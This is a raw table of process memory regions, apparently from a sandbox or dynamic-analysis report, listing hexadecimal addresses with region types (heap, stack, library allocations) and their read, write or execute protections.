page read and write
|
||
|
2F0000
|
heap
|
page read and write
|
||
|
4AB4000
|
heap
|
page read and write
|
||
|
1CCB0000
|
heap
|
page read and write
|
||
|
145000
|
stack
|
page read and write
|
||
|
319000
|
heap
|
page read and write
|
||
|
36F0000
|
trusted library allocation
|
page read and write
|
||
|
352000
|
heap
|
page read and write
|
||
|
27EC000
|
trusted library allocation
|
page read and write
|
||
|
44E000
|
heap
|
page read and write
|
||
|
24C000
|
heap
|
page read and write
|
||
|
2DD1000
|
trusted library allocation
|
page read and write
|
||
|
57D000
|
heap
|
page read and write
|
||
|
29F000
|
heap
|
page read and write
|
||
|
2BDB000
|
heap
|
page read and write
|
||
|
1E60000
|
direct allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
42A000
|
heap
|
page read and write
|
||
|
3CB8000
|
heap
|
page read and write
|
||
|
206D000
|
stack
|
page read and write
|
||
|
1CFB0000
|
heap
|
page read and write
|
||
|
106000
|
heap
|
page read and write
|
||
|
2BE4000
|
heap
|
page read and write
|
||
|
7FE898D0000
|
trusted library allocation
|
page read and write
|
||
|
41CC000
|
heap
|
page read and write
|
||
|
4BE000
|
heap
|
page read and write
|
||
|
3D0C000
|
heap
|
page read and write
|
||
|
3A50000
|
trusted library allocation
|
page read and write
|
||
|
3CF3000
|
heap
|
page read and write
|
||
|
318000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
7FE898DB000
|
trusted library allocation
|
page read and write
|
||
|
290A000
|
trusted library allocation
|
page read and write
|
||
|
3D04000
|
heap
|
page read and write
|
||
|
382000
|
heap
|
page read and write
|
||
|
7FE898C4000
|
trusted library allocation
|
page read and write
|
||
|
179000
|
heap
|
page read and write
|
||
|
221000
|
heap
|
page read and write
|
||
|
24E9000
|
heap
|
page read and write
|
||
|
52A000
|
heap
|
page read and write
|
||
|
3A39000
|
trusted library allocation
|
page read and write
|
||
|
2E4000
|
heap
|
page read and write
|
||
|
2DDE000
|
trusted library allocation
|
page read and write
|
||
|
1E30000
|
heap
|
page read and write
|
||
|
457D000
|
heap
|
page read and write
|
||
|
3487000
|
trusted library allocation
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
119000
|
heap
|
page read and write
|
||
|
3D0C000
|
heap
|
page read and write
|
||
|
17E000
|
heap
|
page read and write
|
||
|
3D6000
|
heap
|
page read and write
|
||
|
3A1A000
|
trusted library allocation
|
page read and write
|
||
|
3443000
|
heap
|
page read and write
|
||
|
4645000
|
heap
|
page read and write
|
||
|
380000
|
direct allocation
|
page read and write
|
||
|
57D000
|
heap
|
page read and write
|
||
|
2D0000
|
heap
|
page read and write
|
||
|
3470000
|
trusted library allocation
|
page read and write
|
||
|
34A000
|
heap
|
page read and write
|
||
|
1D37000
|
direct allocation
|
page read and write
|
||
|
3320000
|
trusted library allocation
|
page read and write
|
||
|
3B10000
|
heap
|
page read and write
|
||
|
2DDA000
|
trusted library allocation
|
page read and write
|
||
|
1DD0000
|
direct allocation
|
page read and write
|
||
|
44D8000
|
heap
|
page read and write
|
||
|
1EA0000
|
heap
|
page read and write
|
||
|
5001000
|
trusted library allocation
|
page read and write
|
||
|
4AC6000
|
heap
|
page read and write
|
||
|
2B0000
|
trusted library allocation
|
page read and write
|
||
|
24C000
|
heap
|
page read and write
|
||
|
1B72E000
|
stack
|
page read and write
|
||
|
3D0000
|
trusted library allocation
|
page execute read
|
||
|
2BC1000
|
heap
|
page read and write
|
||
|
548000
|
heap
|
page read and write
|
||
|
25F3000
|
trusted library allocation
|
page read and write
|
||
|
3690000
|
trusted library allocation
|
page read and write
|
||
|
1E40000
|
direct allocation
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
2A6000
|
heap
|
page read and write
|
||
|
4CA000
|
heap
|
page read and write
|
||
|
2DAB000
|
trusted library allocation
|
page read and write
|
||
|
2DB2000
|
trusted library allocation
|
page read and write
|
||
|
2F4000
|
heap
|
page read and write
|
||
|
3D04000
|
heap
|
page read and write
|
||
|
2BD1000
|
heap
|
page read and write
|
||
|
2022000
|
trusted library allocation
|
page read and write
|
||
|
2DAB000
|
trusted library allocation
|
page read and write
|
||
|
463D000
|
heap
|
page read and write
|
||
|
2B9A000
|
heap
|
page read and write
|
||
|
421A000
|
heap
|
page read and write
|
||
|
41FC000
|
heap
|
page read and write
|
||
|
1C8B5000
|
heap
|
page read and write
|
||
|
3CF7000
|
heap
|
page read and write
|
||
|
2AEC000
|
stack
|
page read and write
|
||
|
488000
|
heap
|
page read and write
|
||
|
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
|
2310000
|
heap
|
page read and write
|
||
|
3D0F000
|
heap
|
page read and write
|
||
|
2DCA000
|
trusted library allocation
|
page read and write
|
||
|
29B0000
|
remote allocation
|
page read and write
|
||
|
549000
|
heap
|
page read and write
|
||
|
4D8000
|
heap
|
page read and write
|
||
|
188000
|
heap
|
page read and write
|
||
|
2E0000
|
heap
|
page read and write
|
||
|
1C850000
|
heap
|
page read and write
|
||
|
2DDA000
|
trusted library allocation
|
page read and write
|
||
|
335C000
|
heap
|
page read and write
|
||
|
1E70000
|
heap
|
page read and write
|
||
|
1EA9000
|
heap
|
page read and write
|
||
|
1C7CF000
|
stack
|
page read and write
|
||
|
2011000
|
trusted library allocation
|
page read and write
|
||
|
1B024000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
269000
|
heap
|
page read and write
|
||
|
1C135000
|
heap
|
page read and write
|
||
|
1D04000
|
heap
|
page read and write
|
||
|
2355000
|
heap
|
page read and write
|
||
|
2329000
|
heap
|
page read and write
|
||
|
21C000
|
stack
|
page read and write
|
||
|
1A4C9000
|
stack
|
page read and write
|
||
|
12A000
|
heap
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
196000
|
heap
|
page read and write
|
||
|
37E000
|
heap
|
page read and write
|
||
|
7FE89AA4000
|
trusted library allocation
|
page read and write
|
||
|
116000
|
heap
|
page read and write
|
||
|
7FE89C10000
|
trusted library allocation
|
page read and write
|
||
|
2E20000
|
trusted library allocation
|
page execute
|
||
|
148000
|
heap
|
page read and write
|
||
|
2015000
|
trusted library allocation
|
page read and write
|
||
|
3382000
|
heap
|
page read and write
|
||
|
33D2000
|
heap
|
page read and write
|
||
|
175000
|
heap
|
page read and write
|
||
|
54F000
|
heap
|
page read and write
|
||
|
4B40000
|
heap
|
page read and write
|
||
|
34F000
|
heap
|
page read and write
|
||
|
2466000
|
heap
|
page read and write
|
||
|
1ACEF000
|
stack
|
page read and write
|
||
|
2687000
|
trusted library allocation
|
page read and write
|
||
|
3BAF000
|
heap
|
page read and write
|
||
|
4B40000
|
heap
|
page read and write
|
||
|
1E34000
|
heap
|
page read and write
|
||
|
2050000
|
heap
|
page execute and read and write
|
||
|
457000
|
heap
|
page read and write
|
||
|
454000
|
heap
|
page read and write
|
||
|
1B664000
|
heap
|
page read and write
|
||
|
446000
|
heap
|
page read and write
|
||
|
192000
|
heap
|
page read and write
|
||
|
3D0C000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
33F8000
|
heap
|
page read and write
|
||
|
7FE89AC4000
|
trusted library allocation
|
page read and write
|
||
|
1C86C000
|
heap
|
page read and write
|
||
|
342B000
|
heap
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
17E000
|
heap
|
page read and write
|
||
|
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
|
44C000
|
heap
|
page read and write
|
||
|
36EE000
|
stack
|
page read and write
|
||
|
2D5000
|
stack
|
page read and write
|
||
|
1C80000
|
trusted library allocation
|
page read and write
|
||
|
417000
|
heap
|
page read and write
|
||
|
5BA000
|
heap
|
page read and write
|
||
|
4DD000
|
heap
|
page read and write
|
||
|
53D000
|
heap
|
page read and write
|
||
|
36F000
|
trusted library allocation
|
page read and write
|
||
|
24EB000
|
heap
|
page read and write
|
||
|
27DC000
|
trusted library allocation
|
page read and write
|
||
|
1D4D000
|
direct allocation
|
page read and write
|
||
|
131000
|
heap
|
page read and write
|
||
|
1A8BF000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2FDE000
|
stack
|
page read and write
|
||
|
54F000
|
heap
|
page read and write
|
||
|
1C1CA000
|
heap
|
page read and write
|
||
|
477000
|
heap
|
page read and write
|
||
|
41C5000
|
heap
|
page read and write
|
||
|
1E04000
|
heap
|
page read and write
|
||
|
104000
|
heap
|
page read and write
|
||
|
39B000
|
direct allocation
|
page read and write
|
||
|
4B1E000
|
heap
|
page read and write
|
||
|
1A8B1000
|
heap
|
page read and write
|
||
|
5C9000
|
heap
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
3201000
|
trusted library allocation
|
page read and write
|
||
|
4F6000
|
heap
|
page read and write
|
||
|
3A30000
|
trusted library allocation
|
page read and write
|
||
|
1D45000
|
heap
|
page read and write
|
||
|
54B000
|
heap
|
page read and write
|
||
|
2A6000
|
heap
|
page read and write
|
||
|
1D33000
|
direct allocation
|
page read and write
|
||
|
112000
|
heap
|
page read and write
|
||
|
2BDE000
|
heap
|
page read and write
|
||
|
2680000
|
heap
|
page read and write
|
||
|
380000
|
heap
|
page read and write
|
||
|
2DC8000
|
trusted library allocation
|
page read and write
|
||
|
4B0F000
|
heap
|
page read and write
|
||
|
40C3000
|
heap
|
page read and write
|
||
|
2BC3000
|
heap
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
|
3433000
|
heap
|
page read and write
|
||
|
2D7000
|
heap
|
page read and write
|
||
|
1CB70000
|
heap
|
page read and write
|
||
|
3A39000
|
trusted library allocation
|
page read and write
|
||
|
4ACA000
|
heap
|
page read and write
|
||
|
373000
|
heap
|
page read and write
|
||
|
4212000
|
heap
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
3D0F000
|
heap
|
page read and write
|
||
|
2584000
|
heap
|
page read and write
|
||
|
2BCE000
|
heap
|
page read and write
|
||
|
1C45D000
|
stack
|
page read and write
|
||
|
2D0000
|
heap
|
page read and write
|
||
|
1B8EF000
|
stack
|
page read and write
|
||
|
1C0000
|
heap
|
page read and write
|
||
|
33F8000
|
heap
|
page read and write
|
||
|
4B9000
|
heap
|
page read and write
|
||
|
3406000
|
heap
|
page read and write
|
||
|
384000
|
heap
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
1B60C000
|
stack
|
page read and write
|
||
|
2DCF000
|
trusted library allocation
|
page read and write
|
||
|
2BDB000
|
heap
|
page read and write
|
||
|
1DB4000
|
heap
|
page read and write
|
||
|
201E000
|
trusted library allocation
|
page read and write
|
||
|
3A40000
|
trusted library allocation
|
page read and write
|
||
|
304000
|
heap
|
page read and write
|
||
|
235F000
|
heap
|
page read and write
|
||
|
39F000
|
direct allocation
|
page read and write
|
||
|
4B1C000
|
heap
|
page read and write
|
||
|
1DF000
|
heap
|
page read and write
|
||
|
4DA000
|
heap
|
page read and write
|
||
|
3433000
|
heap
|
page read and write
|
||
|
565000
|
heap
|
page read and write
|
||
|
2DAE000
|
trusted library allocation
|
page read and write
|
||
|
38D5000
|
heap
|
page read and write
|
||
|
245B000
|
stack
|
page read and write
|
||
|
2EF000
|
heap
|
page read and write
|
||
|
1D90000
|
direct allocation
|
page read and write
|
||
|
399000
|
heap
|
page read and write
|
||
|
421A000
|
heap
|
page read and write
|
||
|
3CFD000
|
heap
|
page read and write
|
||
|
330F000
|
stack
|
page read and write
|
||
|
450000
|
trusted library allocation
|
page read and write
|
||
|
2DDD000
|
trusted library allocation
|
page read and write
|
||
|
4003000
|
heap
|
page read and write
|
||
|
3406000
|
heap
|
page read and write
|
||
|
464E000
|
heap
|
page read and write
|
||
|
1CDBE000
|
stack
|
page read and write
|
||
|
4214000
|
heap
|
page read and write
|
||
|
7FE898DB000
|
trusted library allocation
|
page read and write
|
||
|
5A51000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
heap
|
page read and write
|
||
|
37C000
|
heap
|
page read and write
|
||
|
1C94F000
|
stack
|
page read and write
|
||
|
1FF000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
3CB3000
|
heap
|
page read and write
|
||
|
5CD000
|
heap
|
page read and write
|
||
|
52D000
|
heap
|
page read and write
|
||
|
16F000
|
heap
|
page read and write
|
||
|
2314000
|
heap
|
page read and write
|
||
|
42FE000
|
stack
|
page read and write
|
||
|
352000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
1F0000
|
trusted library allocation
|
page read and write
|
||
|
4126000
|
heap
|
page read and write
|
||
|
4538000
|
heap
|
page read and write
|
||
|
1B660000
|
heap
|
page read and write
|
||
|
594000
|
heap
|
page read and write
|
||
|
3BB7000
|
heap
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
17B000
|
heap
|
page read and write
|
||
|
22ED000
|
heap
|
page read and write
|
||
|
3431000
|
heap
|
page read and write
|
||
|
1DC0000
|
direct allocation
|
page read and write
|
||
|
4AE000
|
heap
|
page read and write
|
||
|
2A8000
|
heap
|
page read and write
|
||
|
22E5000
|
trusted library allocation
|
page read and write
|
||
|
22DE000
|
stack
|
page read and write
|
||
|
3CB3000
|
heap
|
page read and write
|
||
|
4B40000
|
heap
|
page read and write
|
||
|
3420000
|
heap
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
3325000
|
trusted library allocation
|
page read and write
|
||
|
3D04000
|
heap
|
page read and write
|
||
|
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
|
37B000
|
heap
|
page read and write
|
||
|
2290000
|
heap
|
page read and write
|
||
|
2B50000
|
heap
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89976000
|
trusted library allocation
|
page read and write
|
||
|
41D2000
|
heap
|
page read and write
|
||
|
1C220000
|
heap
|
page read and write
|
||
|
414000
|
heap
|
page read and write
|
||
|
3BBD000
|
heap
|
page read and write
|
||
|
1C16B000
|
heap
|
page read and write
|
||
|
192000
|
heap
|
page read and write
|
||
|
586000
|
heap
|
page read and write
|
||
|
1A568000
|
heap
|
page execute and read and write
|
||
|
2DCE000
|
trusted library allocation
|
page read and write
|
||
|
52A000
|
heap
|
page read and write
|
||
|
196000
|
heap
|
page read and write
|
||
|
1A78E000
|
heap
|
page execute and read and write
|
||
|
26C000
|
stack
|
page read and write
|
||
|
3433000
|
heap
|
page read and write
|
||
|
244E000
|
trusted library allocation
|
page read and write
|
||
|
14F000
|
heap
|
page read and write
|
||
|
565000
|
heap
|
page read and write
|
||
|
45F5000
|
heap
|
page read and write
|
||
|
1D4F000
|
direct allocation
|
page read and write
|
||
|
4212000
|
heap
|
page read and write
|
||
|
3B60000
|
heap
|
page read and write
|
||
|
48C000
|
heap
|
page read and write
|
||
|
46A0000
|
trusted library allocation
|
page read and write
|
||
|
27B6000
|
trusted library allocation
|
page read and write
|
||
|
7FE89970000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1B5E0000
|
heap
|
page read and write
|
||
|
3431000
|
heap
|
page read and write
|
||
|
38CD000
|
heap
|
page read and write
|
||
|
27C2000
|
trusted library allocation
|
page read and write
|
||
|
525000
|
heap
|
page read and write
|
||
|
1ADDE000
|
stack
|
page read and write | page guard
|
||
|
1AA62000
|
heap
|
page read and write
|
||
|
1D70000
|
direct allocation
|
page read and write
|
||
|
494000
|
heap
|
page read and write
|
||
|
7FE89AB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B0000
|
heap
|
page read and write
|
||
|
25DF000
|
trusted library allocation
|
page read and write
|
||
|
490000
|
heap
|
page read and write
|
||
|
3378000
|
heap
|
page read and write
|
||
|
7FE8997C000
|
trusted library allocation
|
page execute and read and write
|
||
|
13A000
|
heap
|
page read and write
|
||
|
2BDE000
|
heap
|
page read and write
|
||
|
33E6000
|
heap
|
page read and write
|
||
|
52D000
|
heap
|
page read and write
|
||
|
586000
|
heap
|
page read and write
|
||
|
358000
|
heap
|
page read and write
|
||
|
3373000
|
heap
|
page read and write
|
||
|
25F5000
|
heap
|
page read and write
|
||
|
20F1000
|
trusted library allocation
|
page read and write
|
||
|
4912000
|
heap
|
page read and write
|
||
|
1D20000
|
direct allocation
|
page read and write
|
||
|
4002000
|
heap
|
page read and write
|
||
|
351000
|
heap
|
page read and write
|
||
|
120F1000
|
trusted library allocation
|
page read and write
|
||
|
4451000
|
heap
|
page read and write
|
||
|
18B000
|
heap
|
page read and write
|
||
|
34A000
|
heap
|
page read and write
|
||
|
7FE898C4000
|
trusted library allocation
|
page read and write
|
||
|
44C000
|
heap
|
page read and write
|
||
|
24FE000
|
heap
|
page read and write
|
||
|
414000
|
heap
|
page read and write
|
||
|
196000
|
heap
|
page read and write
|
||
|
1E33000
|
direct allocation
|
page read and write
|
||
|
57D000
|
heap
|
page read and write
|
||
|
3CE9000
|
heap
|
page read and write
|
||
|
3490000
|
trusted library allocation
|
page read and write
|
||
|
460A000
|
heap
|
page read and write
|
||
|
3443000
|
heap
|
page read and write
|
||
|
223000
|
heap
|
page read and write
|
||
|
12181000
|
trusted library allocation
|
page read and write
|
||
|
3A62000
|
trusted library allocation
|
page read and write
|
||
|
3D04000
|
heap
|
page read and write
|
||
|
1B0000
|
heap
|
page read and write
|
||
|
41EE000
|
stack
|
page read and write
|
||
|
1EF0000
|
heap
|
page read and write
|
||
|
1CB0000
|
trusted library allocation
|
page read and write
|
||
|
1FCB000
|
heap
|
page read and write
|
||
|
3445000
|
heap
|
page read and write
|
||
|
199000
|
heap
|
page read and write
|
||
|
4D9000
|
heap
|
page read and write
|
||
|
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
|
54B000
|
heap
|
page read and write
|
||
|
7FE89AC8000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AA4000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AA2000
|
trusted library allocation
|
page read and write
|
||
|
27AC000
|
trusted library allocation
|
page read and write
|
||
|
2DC8000
|
trusted library allocation
|
page read and write
|
||
|
3A10000
|
trusted library allocation
|
page read and write
|
||
|
3CF0000
|
trusted library allocation
|
page read and write
|
||
|
4106000
|
heap
|
page read and write
|
||
|
24E9000
|
heap
|
page read and write
|
||
|
2BDE000
|
heap
|
page read and write
|
||
|
489000
|
heap
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2BCE000
|
heap
|
page read and write
|
||
|
44D000
|
heap
|
page read and write
|
||
|
30E000
|
heap
|
page read and write
|
||
|
4214000
|
heap
|
page read and write
|
||
|
1E10000
|
direct allocation
|
page read and write
|
||
|
24B1000
|
heap
|
page read and write
|
||
|
126000
|
heap
|
page read and write
|
||
|
2FF000
|
heap
|
page read and write
|
||
|
2EC000
|
heap
|
page read and write
|
||
|
1C8A2000
|
heap
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
|
3CE000
|
heap
|
page read and write
|
||
|
1D60000
|
direct allocation
|
page read and write
|
||
|
41D2000
|
heap
|
page read and write
|
||
|
3CBB000
|
heap
|
page read and write
|
||
|
4002000
|
heap
|
page read and write
|
||
|
3BF000
|
heap
|
page read and write
|
||
|
46A0000
|
trusted library allocation
|
page read and write
|
||
|
7FE898D3000
|
trusted library allocation
|
page read and write
|
||
|
4B24000
|
heap
|
page read and write
|
||
|
1C4000
|
heap
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
53C000
|
heap
|
page read and write
|
||
|
2BC9000
|
heap
|
page read and write
|
||
|
3376000
|
heap
|
page read and write
|
||
|
4EF000
|
heap
|
page read and write
|
||
|
41D8000
|
heap
|
page read and write
|
||
|
1D40000
|
direct allocation
|
page read and write
|
||
|
2DC5000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C20000
|
trusted library allocation
|
page read and write
|
||
|
12A000
|
heap
|
page read and write
|
||
|
55F000
|
heap
|
page read and write
|
||
|
41F9000
|
heap
|
page read and write
|
||
|
4AC6000
|
heap
|
page read and write
|
||
|
1C1ED000
|
heap
|
page read and write
|
||
|
41FC000
|
heap
|
page read and write
|
||
|
3444000
|
heap
|
page read and write
|
||
|
1B020000
|
heap
|
page read and write
|
||
|
4212000
|
heap
|
page read and write
|
||
|
170000
|
heap
|
page read and write
|
||
|
7FE89A73000
|
trusted library allocation
|
page read and write
|
||
|
196000
|
heap
|
page read and write
|
||
|
307000
|
heap
|
page read and write
|
||
|
10D000
|
heap
|
page read and write
|
||
|
1CF3F000
|
stack
|
page read and write
|
||
|
542000
|
heap
|
page read and write
|
||
|
17D000
|
heap
|
page read and write
|
||
|
41FC000
|
heap
|
page read and write
|
||
|
1B0000
|
trusted library allocation
|
page read and write
|
||
|
2BC8000
|
heap
|
page read and write
|
||
|
3AC000
|
heap
|
page read and write
|
||
|
4B9000
|
heap
|
page read and write
|
||
|
108000
|
heap
|
page read and write
|
||
|
4450000
|
heap
|
page read and write
|
||
|
498000
|
heap
|
page read and write
|
||
|
4649000
|
heap
|
page read and write
|
||
|
9601000
|
trusted library allocation
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
4CF000
|
heap
|
page read and write
|
||
|
1B4D0000
|
heap
|
page read and write
|
||
|
2D4000
|
heap
|
page read and write
|
||
|
27F4000
|
trusted library allocation
|
page read and write
|
||
|
2EB0000
|
trusted library allocation
|
page read and write
|
||
|
4B0000
|
heap
|
page read and write
|
||
|
4212000
|
heap
|
page read and write
|
||
|
3CF0000
|
trusted library allocation
|
page read and write
|
||
|
554000
|
heap
|
page read and write
|
||
|
4E0000
|
heap
|
page read and write
|
||
|
1C883000
|
heap
|
page read and write
|
||
|
1C6BE000
|
stack
|
page read and write
|
||
|
41FC000
|
heap
|
page read and write
|
||
|
116000
|
heap
|
page read and write
|
||
|
157000
|
heap
|
page read and write
|
||
|
1B9000
|
heap
|
page read and write
|
||
|
123000
|
heap
|
page read and write
|
||
|
421A000
|
heap
|
page read and write
|
||
|
24FB000
|
heap
|
page read and write
|
||
|
3443000
|
heap
|
page read and write
|
||
|
1EE000
|
heap
|
page read and write
|
||
|
3C5D000
|
heap
|
page read and write
|
||
|
7FE899A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
193000
|
heap
|
page read and write
|
||
|
14D000
|
heap
|
page read and write
|
||
|
1A750000
|
heap
|
page execute and read and write
|
||
|
385F000
|
stack
|
page read and write
|
||
|
2FC000
|
heap
|
page read and write
|
||
|
494000
|
heap
|
page read and write
|
||
|
505000
|
heap
|
page read and write
|
||
|
3382000
|
heap
|
page read and write
|
||
|
4715000
|
heap
|
page read and write
|
||
|
1C02E000
|
stack
|
page read and write
|
||
|
280C000
|
trusted library allocation
|
page read and write
|
||
|
3444000
|
heap
|
page read and write
|
||
|
724000
|
heap
|
page read and write
|
||
|
4B40000
|
heap
|
page read and write
|
||
|
545000
|
heap
|
page read and write
|
||
|
2270000
|
heap
|
page read and write
|
||
|
197000
|
heap
|
page read and write
|
||
|
41D4000
|
heap
|
page read and write
|
||
|
25F2000
|
trusted library allocation
|
page read and write
|
||
|
53D000
|
heap
|
page read and write
|
||
|
7FE89BD1000
|
trusted library allocation
|
page read and write
|
||
|
2BE4000
|
heap
|
page read and write
|
||
|
4B20000
|
heap
|
page read and write
|
||
|
3251000
|
trusted library allocation
|
page read and write
|
||
|
4C1000
|
heap
|
page read and write
|
||
|
3CB3000
|
heap
|
page read and write
|
||
|
1A8FA000
|
heap
|
page read and write
|
||
|
5C4000
|
heap
|
page read and write
|
||
|
469000
|
heap
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
230000
|
heap
|
page read and write
|
||
|
3E1A000
|
trusted library allocation
|
page read and write
|
||
|
3C8C000
|
heap
|
page read and write
|
||
|
2AF0000
|
heap
|
page read and write
|
||
|
38D0000
|
heap
|
page read and write
|
||
|
2DD4000
|
trusted library allocation
|
page read and write
|
||
|
248D000
|
trusted library allocation
|
page read and write
|
||
|
33D2000
|
heap
|
page read and write
|
||
|
1E27000
|
direct allocation
|
page read and write
|
||
|
505000
|
heap
|
page read and write
|
||
|
3D0F000
|
heap
|
page read and write
|
||
|
38CB000
|
heap
|
page read and write
|
||
|
4507000
|
heap
|
page read and write
|
||
|
1F90000
|
heap
|
page read and write
|
||
|
24B0000
|
heap
|
page read and write
|
||
|
10A000
|
heap
|
page read and write
|
||
|
3E8000
|
heap
|
page read and write
|
||
|
1BA30000
|
heap
|
page read and write
|
||
|
4EB000
|
heap
|
page read and write
|
||
|
2980000
|
trusted library allocation
|
page read and write
|
||
|
45F9000
|
heap
|
page read and write
|
||
|
2DC9000
|
trusted library allocation
|
page read and write
|
||
|
2C5000
|
stack
|
page read and write
|
||
|
344B000
|
heap
|
page read and write
|
||
|
24E6000
|
heap
|
page read and write
|
||
|
2DA9000
|
trusted library allocation
|
page read and write
|
||
|
72B000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2ACC000
|
stack
|
page read and write
|
||
|
2DA7000
|
trusted library allocation
|
page read and write
|
||
|
2B0000
|
trusted library allocation
|
page read and write
|
||
|
1C050000
|
heap
|
page read and write
|
||
|
525000
|
heap
|
page read and write
|
||
|
1F90000
|
heap
|
page read and write
|
||
|
27FE000
|
trusted library allocation
|
page read and write
|
||
|
3B6D000
|
stack
|
page read and write
|
||
|
7FE89A77000
|
trusted library allocation
|
page read and write
|
||
|
12A000
|
heap
|
page read and write
|
||
|
3FA1000
|
heap
|
page read and write
|
||
|
2B57000
|
heap
|
page read and write
|
||
|
2DCE000
|
trusted library allocation
|
page read and write
|
||
|
387000
|
direct allocation
|
page read and write
|
||
|
2DD1000
|
trusted library allocation
|
page read and write
|
||
|
2340000
|
trusted library allocation
|
page execute
|
||
|
4A4000
|
heap
|
page read and write
|
||
|
3D0C000
|
heap
|
page read and write
|
||
|
4112000
|
heap
|
page read and write
|
||
|
1C85C000
|
heap
|
page read and write
|
||
|
189000
|
heap
|
page read and write
|
||
|
4537000
|
heap
|
page read and write
|
||
|
38D5000
|
heap
|
page read and write
|
||
|
4912000
|
heap
|
page read and write
|
||
|
724000
|
heap
|
page read and write
|
||
|
4710000
|
heap
|
page read and write
|
||
|
25DB000
|
trusted library allocation
|
page read and write
|
||
|
464E000
|
heap
|
page read and write
|
||
|
2730000
|
trusted library allocation
|
page read and write
|
||
|
4B1C000
|
heap
|
page read and write
|
||
|
453C000
|
heap
|
page read and write
|
||
|
4B13000
|
heap
|
page read and write
|
||
|
3BFE000
|
heap
|
page read and write
|
||
|
4F5000
|
heap
|
page read and write
|
||
|
7FE89980000
|
trusted library allocation
|
page execute and read and write
|
||
|
586000
|
heap
|
page read and write
|
||
|
464F000
|
heap
|
page read and write
|
||
|
352000
|
heap
|
page read and write
|
||
|
12B000
|
heap
|
page read and write
|
||
|
11F000
|
heap
|
page read and write
|
||
|
413000
|
heap
|
page read and write
|
||
|
543000
|
heap
|
page read and write
|
||
|
38C6000
|
heap
|
page read and write
|
||
|
5CD000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2DB2000
|
trusted library allocation
|
page read and write
|
||
|
38D5000
|
heap
|
page read and write
|
||
|
3443000
|
heap
|
page read and write
|
||
|
4B4000
|
heap
|
page read and write
|
||
|
4CE000
|
heap
|
page read and write
|
||
|
4201000
|
heap
|
page read and write
|
||
|
3CB3000
|
heap
|
page read and write
|
||
|
4D8000
|
heap
|
page read and write
|
||
|
23EF000
|
stack
|
page read and write
|
||
|
233B000
|
trusted library allocation
|
page read and write
|
||
|
53D000
|
heap
|
page read and write
|
||
|
196000
|
heap
|
page read and write
|
||
|
38F0000
|
trusted library allocation
|
page read and write
|
||
|
4AB6000
|
heap
|
page read and write
|
||
|
1E00000
|
heap
|
page read and write
|
||
|
54B000
|
heap
|
page read and write
|
||
|
46E000
|
heap
|
page read and write
|
||
|
1B5E5000
|
heap
|
page read and write
|
||
|
463A000
|
heap
|
page read and write
|
||
|
270000
|
heap
|
page read and write
|
||
|
38D0000
|
heap
|
page read and write
|
||
|
1AA30000
|
heap
|
page read and write
|
||
|
37A000
|
heap
|
page read and write
|
||
|
30EE000
|
stack
|
page read and write
|
||
|
446000
|
heap
|
page read and write
|
||
|
2BE6000
|
heap
|
page read and write
|
||
|
270000
|
heap
|
page read and write
|
||
|
22E8000
|
trusted library allocation
|
page read and write
|
||
|
1A933000
|
heap
|
page read and write
|
||
|
286C000
|
stack
|
page read and write
|
||
|
3BBC000
|
heap
|
page read and write
|
||
|
22A6000
|
heap
|
page read and write
|
||
|
1A0000
|
heap
|
page read and write
|
||
|
4913000
|
heap
|
page read and write
|
||
|
1D10000
|
heap
|
page execute and read and write
|
||
|
2E0000
|
heap
|
page read and write
|
||
|
39DF000
|
trusted library allocation
|
page read and write
|
||
|
52D000
|
heap
|
page read and write
|
||
|
38D8000
|
heap
|
page read and write
|
||
|
2D8000
|
heap
|
page read and write
|
||
|
45F0000
|
heap
|
page read and write
|
||
|
394000
|
heap
|
page read and write
|
||
|
7FE89AB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22FF000
|
trusted library allocation
|
page read and write
|
||
|
1D70000
|
heap
|
page read and write
|
||
|
1A758000
|
heap
|
page execute and read and write
|
||
|
51E000
|
heap
|
page read and write
|
||
|
313000
|
heap
|
page read and write
|
||
|
41F9000
|
heap
|
page read and write
|
||
|
